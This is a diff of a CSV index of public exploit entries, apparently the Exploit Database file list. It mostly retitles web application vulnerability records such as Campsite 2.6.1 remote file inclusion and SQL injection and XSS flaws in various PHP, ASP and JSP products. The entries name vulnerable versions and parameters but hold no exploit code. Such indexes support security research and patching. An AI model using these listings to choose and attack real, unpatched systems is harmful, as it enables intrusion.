-29990,platforms/php/webapps/29990.txt,"Campsite 2.6.1 - Subscription.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29991,platforms/php/webapps/29991.txt,"Campsite 2.6.1 - SubscriptionDefaultTime.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29996,platforms/php/webapps/29996.txt,"Campsite 2.6.1 - topic.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29997,platforms/php/webapps/29997.txt,"Campsite 2.6.1 - UrlType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29998,platforms/php/webapps/29998.txt,"Campsite 2.6.1 - user.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29999,platforms/php/webapps/29999.txt,"Campsite 2.6.1 - UserType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 - 'Alias.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 - 'article.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29968,platforms/php/webapps/29968.txt,"Campsite 2.6.1 - 'ArticleAttachment.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29969,platforms/php/webapps/29969.txt,"Campsite 2.6.1 - 'ArticleComment.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29970,platforms/php/webapps/29970.txt,"Campsite 2.6.1 - 'ArticleData.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29971,platforms/php/webapps/29971.txt,"Campsite 2.6.1 - 'ArticleImage.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29972,platforms/php/webapps/29972.txt,"Campsite 2.6.1 - 'ArticleIndex.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29973,platforms/php/webapps/29973.txt,"Campsite 2.6.1 - 'ArticlePublish.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29974,platforms/php/webapps/29974.txt,"Campsite 2.6.1 - 'ArticleTopic.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29975,platforms/php/webapps/29975.txt,"Campsite 2.6.1 - 'ArticleType.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29976,platforms/php/webapps/29976.txt,"Campsite 2.6.1 - 'ArticleTypeField.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29977,platforms/php/webapps/29977.txt,"Campsite 2.6.1 - 'Country.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29978,platforms/php/webapps/29978.txt,"Campsite 2.6.1 - 'DatabaseObject.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29979,platforms/php/webapps/29979.txt,"Campsite 2.6.1 - 'Event.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29980,platforms/php/webapps/29980.txt,"Campsite 2.6.1 - 'IPAccess.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29981,platforms/php/webapps/29981.txt,"Campsite 2.6.1 - 'image.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29982,platforms/php/webapps/29982.txt,"Campsite 2.6.1 - 'issue.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29983,platforms/php/webapps/29983.txt,"Campsite 2.6.1 - 'IssuePublish.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29984,platforms/php/webapps/29984.txt,"Campsite 2.6.1 - 'Language.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29985,platforms/php/webapps/29985.txt,"Campsite 2.6.1 - 'Log.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29986,platforms/php/webapps/29986.txt,"Campsite 2.6.1 - 'LoginAttempts.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29987,platforms/php/webapps/29987.txt,"Campsite 2.6.1 - 'Publication.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29988,platforms/php/webapps/29988.txt,"Campsite 2.6.1 - 'Section.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29989,platforms/php/webapps/29989.txt,"Campsite 2.6.1 - 'ShortURL.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29990,platforms/php/webapps/29990.txt,"Campsite 2.6.1 - 'Subscription.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29991,platforms/php/webapps/29991.txt,"Campsite 2.6.1 - 'SubscriptionDefaultTime.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29996,platforms/php/webapps/29996.txt,"Campsite 2.6.1 - 'topic.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29997,platforms/php/webapps/29997.txt,"Campsite 2.6.1 - 'UrlType.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29998,platforms/php/webapps/29998.txt,"Campsite 2.6.1 - 'user.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29999,platforms/php/webapps/29999.txt,"Campsite 2.6.1 - 'UserType.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30000,platforms/ios/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,ios,webapps,0 30002,platforms/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0 -30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - implementation/Management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/Management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php password0 Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php language' Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - 'implementation/Management/configuration.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - 'implementation/Management/db_connect.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php?password' SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php?language' SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps,0 30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 - hlstats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 @@ -31717,13 +31718,13 @@ id,file,description,date,author,platform,type,port 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 30088,platforms/php/webapps/30088.txt,"Pligg CMS 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - 'news.php' SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 -30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - demo/pop3/error.php selected_theme Parameter Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 -30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Parameters Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 +30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php?selected_theme' Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 +30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Full Path Disclosures",2007-05-29,"Michal Majchrowicz",php,webapps,0 30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 - 'manufacturer.php' SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0 30102,platforms/php/webapps/30102.php,"Pheap 2.0 - config.php Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0 30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 - Archives.php SQL Injection",2007-03-16,Serapis.net,php,webapps,0 -30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Persistent Cross-Site Scripting in Multiple Parameters",2013-12-11,sajith,php,webapps,0 +30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Multiple Persistent Cross-Site Scripting Vulnerabilities",2013-12-11,sajith,php,webapps,0 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0 30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 30216,platforms/cfm/webapps/30216.txt,"FuseTalk 4.0 - AuthError.cfm Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 @@ -31731,8 +31732,8 @@ id,file,description,date,author,platform,type,port 30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 - 'index.php' Local File Inclusion",2007-06-21,r0t,php,webapps,0 30221,platforms/php/webapps/30221.txt,"PHPAccounts 0.5 - 'index.php' Multiple SQL Injections",2007-06-21,r0t,php,webapps,0 30223,platforms/php/webapps/30223.txt,"NetClassifieds 1.9.7 - Multiple Input Validation Vulnerabilities",2007-06-21,"laurent gaffie",php,webapps,0 -30225,platforms/php/webapps/30225.txt,"eNdonesia 8.4 - mod.php viewarticle Action artid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 -30226,platforms/php/webapps/30226.txt,"eNdonesia 8.4 - banners.php click Action bid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 +30225,platforms/php/webapps/30225.txt,"eNdonesia 8.4 - 'mod.php?viewarticle Action artid' SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 +30226,platforms/php/webapps/30226.txt,"eNdonesia 8.4 - 'banners.php?click Action bid' SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 30227,platforms/php/webapps/30227.txt,"Joomla! / Mambo Component Mod_Forum - 'PHPBB_Root.php' Remote File Inclusion",2007-06-22,spymeta,php,webapps,0 30230,platforms/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection",2007-06-25,netVigilance,php,webapps,0 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 @@ -31750,30 +31751,30 @@ id,file,description,date,author,platform,type,port 30261,platforms/php/webapps/30261.txt,"Moodle 1.7.1 - 'index.php' Cross-Site Scripting",2007-07-02,MustLive,php,webapps,0 30262,platforms/php/webapps/30262.txt,"Liesbeth Base CMS - Information Disclosure",2007-07-02,durito,php,webapps,0 30263,platforms/cgi/webapps/30263.txt,"Oliver - Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps,0 -30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - '/jspui/applicationList.jsp alpha' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 -30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - '/jspui/appConfig.jsp task' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - '/jspui/applicationList.jsp?alpha' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - '/jspui/appConfig.jsp?task' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 30268,platforms/jsp/webapps/30268.txt,"NetFlow Analyzer 5 - netflow/jspui/index.jsp view Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 -30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 - '/jspui/selectDevice.jsp rtype' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 -30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 - '/jspui/customReport.jsp rtype' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 - '/jspui/selectDevice.jsp?rtype' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 - '/jspui/customReport.jsp?rtype' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 30271,platforms/java/webapps/30271.txt,"OpManager 6/7 - ping.do name Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - traceRoute.do name Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 -30273,platforms/java/webapps/30273.txt,"OpManager 6/7 - reports/ReportViewAction.do Multiple Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 +30273,platforms/java/webapps/30273.txt,"OpManager 6/7 - reports/ReportViewAction.do Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,java,webapps,0 30274,platforms/java/webapps/30274.txt,"OpManager 6/7 - admin/ServiceConfiguration.do Operation Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 -30275,platforms/java/webapps/30275.txt,"OpManager 6/7 - admin/DeviceAssociation.do Multiple Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 -30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusion",2007-07-05,"Adriel T. Desautels",php,webapps,0 +30275,platforms/java/webapps/30275.txt,"OpManager 6/7 - 'admin/DeviceAssociation.do' Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,java,webapps,0 +30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusions",2007-07-05,"Adriel T. Desautels",php,webapps,0 30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 - Oku.asp SQL Injection",2007-07-07,GeFORC3,asp,webapps,0 -30289,platforms/asp/webapps/30289.txt,"EnViVo!CMS - default.asp ID Parameter SQL Injection",2007-07-11,durito,asp,webapps,0 +30289,platforms/asp/webapps/30289.txt,"EnViVo!CMS - 'default.asp?ID' SQL Injection",2007-07-11,durito,asp,webapps,0 30290,platforms/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",php,webapps,0 30293,platforms/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",php,webapps,0 30294,platforms/php/webapps/30294.txt,"Inmostore 4.0 - 'index.php' SQL Injection",2007-07-12,Keniobats,php,webapps,0 30296,platforms/asp/webapps/30296.txt,"ActiveWeb Contentserver 5.6.2929 - 'Picture_Real_Edit.asp' SQL Injection",2007-07-13,"RedTeam Pentesting",asp,webapps,0 -30297,platforms/asp/webapps/30297.txt,"contentserver 5.6.2929 - errors/rights.asp msg Parameter Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 -30298,platforms/asp/webapps/30298.txt,"contentserver 5.6.2929 - errors/transaction.asp msg Parameter Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 +30297,platforms/asp/webapps/30297.txt,"contentserver 5.6.2929 - 'errors/rights.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 +30298,platforms/asp/webapps/30298.txt,"contentserver 5.6.2929 - 'errors/transaction.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 30299,platforms/php/webapps/30299.txt,"ActiveWeb Contentserver CMS 5.6.2929 - Client-Side Filtering Bypass",2007-07-13,"RedTeam Pentesting",php,webapps,0 30300,platforms/asp/webapps/30300.txt,"MzK Blog - Katgoster.asp SQL Injection",2007-03-23,GeFORC3,asp,webapps,0 -30301,platforms/php/webapps/30301.txt,"Dating Gold 3.0.5 - header.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 -30302,platforms/php/webapps/30302.txt,"Dating Gold 3.0.5 - footer.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 -30303,platforms/php/webapps/30303.txt,"Dating Gold 3.0.5 - secure.admin.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 +30301,platforms/php/webapps/30301.txt,"Dating Gold 3.0.5 - 'header.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 +30302,platforms/php/webapps/30302.txt,"Dating Gold 3.0.5 - 'footer.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 +30303,platforms/php/webapps/30303.txt,"Dating Gold 3.0.5 - 'secure.admin.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 30383,platforms/php/webapps/30383.txt,"Vikingboard 0.1.2 - 'cp.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0 30384,platforms/php/webapps/30384.txt,"Vikingboard 0.1.2 - 'user.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0 30385,platforms/php/webapps/30385.txt,"Vikingboard 0.1.2 - 'post.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0 @@ -31781,7 +31782,7 @@ id,file,description,date,author,platform,type,port 30387,platforms/php/webapps/30387.txt,"Vikingboard 0.1.2 - 'forum.php' Information Disclosure",2007-07-25,Lostmon,php,webapps,0 30388,platforms/php/webapps/30388.txt,"Vikingboard 0.1.2 - 'cp.php' Information Disclosure",2007-07-25,Lostmon,php,webapps,0 30389,platforms/php/webapps/30389.txt,"iFoto 1.0 - 'index.php' Directory Traversal",2007-07-25,Lostmon,php,webapps,0 -30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - 'Username' Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0 +30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - 'Username' SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0 30391,platforms/php/webapps/30391.txt,"PHPHostBot 1.05 - 'Authorize.php' Remote File Inclusion",2007-07-26,S4M3K,php,webapps,0 30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 30310,platforms/php/webapps/30310.txt,"Piwigo CMS 2.5.3 - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0 @@ -31791,10 +31792,10 @@ id,file,description,date,author,platform,type,port 30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - Philboard_forum.asp SQL Injection",2007-07-17,GeFORC3,asp,webapps,0 30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection",2007-07-17,joseph.giron13,php,webapps,0 30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0 -30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - 'deletecomment.php id' Parameter Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 -30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - 'deleteblog.php id' Parameter Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 -30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - install/upgrade-0-2-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 -30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 - install/upgrade-0-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 +30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 +30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 +30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - 'install/upgrade-0-2-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 +30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 - 'install/upgrade-0-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - 'wp-admin/page-new.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30327,platforms/asp/webapps/30327.html,"Dora Emlak 1.0 Script - Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30328,platforms/asp/webapps/30328.txt,"Alisveris Sitesi Scripti - index.asp SQL Injection",2007-07-23,GeFORC3,asp,webapps,0 @@ -31837,9 +31838,9 @@ id,file,description,date,author,platform,type,port 31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 - 'setup.php3' Cross-Site Scripting",2008-03-22,ZoRLu,php,webapps,0 31468,platforms/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages - Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps,0 30799,platforms/php/webapps/30799.txt,"MySpace Scripts Poll Creator - 'index.php' HTML Injection",2007-11-22,Doz,php,webapps,0 -30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 - myalbum/ratephoto.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 - modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 - modules/arcade/index.php gid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 - 'myalbum/ratephoto.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 - 'modules/banners/click.php?bid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 - 'modules/arcade/index.php?gid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 30423,platforms/asp/webapps/30423.txt,"Metyus Forum Portal 1.0 - Philboard_Forum.asp SQL Injection",2007-07-27,Cr@zy_King,asp,webapps,0 30424,platforms/asp/webapps/30424.txt,"Berthanas Ziyaretci Defteri 2.0 - Yonetici.asp SQL Injection",2007-07-28,Yollubunlar,asp,webapps,0 30425,platforms/asp/webapps/30425.txt,"Online Store Application Template - Sign_In.aspx SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 @@ -31847,32 +31848,32 @@ id,file,description,date,author,platform,type,port 30427,platforms/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI - 'login.asp' SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30428,platforms/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog - SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30429,platforms/php/webapps/30429.txt,"phpCoupon - Remote Payment Bypass",2007-07-28,freeprotect.net,php,webapps,0 -30433,platforms/php/webapps/30433.txt,"IT!CMS 0.2 - lang-en.php wndtitle Parameter Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 -30434,platforms/php/webapps/30434.txt,"IT!CMS 0.2 - menu-ed.php wndtitle Parameter Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 -30435,platforms/php/webapps/30435.txt,"IT!CMS 0.2 - titletext-ed.php wndtitle Parameter Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 +30433,platforms/php/webapps/30433.txt,"IT!CMS 0.2 - 'lang-en.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 +30434,platforms/php/webapps/30434.txt,"IT!CMS 0.2 - 'menu-ed.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 +30435,platforms/php/webapps/30435.txt,"IT!CMS 0.2 - 'titletext-ed.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 30436,platforms/php/webapps/30436.txt,"Global Centre Aplomb Poll 1.1 - 'index.php' Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 -30437,platforms/php/webapps/30437.txt,"Global Centre Aplomb Poll 1.1 - vote.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 -30438,platforms/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 - admin.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 +30437,platforms/php/webapps/30437.txt,"Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 +30438,platforms/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 - 'admin.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30440,platforms/cgi/webapps/30440.txt,"WebEvent 4.03 - Webevent.cgi Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps,0 30442,platforms/php/webapps/30442.txt,"WebDirector - 'index.php' Cross-Site Scripting",2007-08-01,r0t,php,webapps,0 30443,platforms/php/webapps/30443.txt,"WordPress Theme Persuasion 2.x - Arbitrary File Download / File Deletion",2013-12-23,"Interference Security",php,webapps,80 30445,platforms/php/webapps/30445.txt,"Joomla! Component Tour de France Pool 1.0.1 Module - MosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,php,webapps,0 30446,platforms/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 - Duyuruoku.asp SQL Injection",2007-08-02,Yollubunlar.Org,asp,webapps,0 -30448,platforms/php/webapps/30448.txt,"Lanius CMS 1.2.14 FAQ Module - 'mid' Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 -30449,platforms/php/webapps/30449.txt,"Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 +30448,platforms/php/webapps/30448.txt,"Lanius CMS 1.2.14 FAQ Module - 'mid' SQL Injection",2007-08-03,k1tk4t,php,webapps,0 +30449,platforms/php/webapps/30449.txt,"Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30450,platforms/php/webapps/30450.txt,"Lanius CMS 1.2.14 GALLERY Module - gid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30451,platforms/asp/webapps/30451.txt,"Next Gen Portfolio Manager - 'default.asp' Multiple SQL Injections",2007-08-03,"Aria-Security Team",asp,webapps,0 30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 - comPath Remote File Inclusion",2007-08-04,Yollubunlar.Org,php,webapps,0 30453,platforms/php/webapps/30453.txt,"snif 1.5.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0 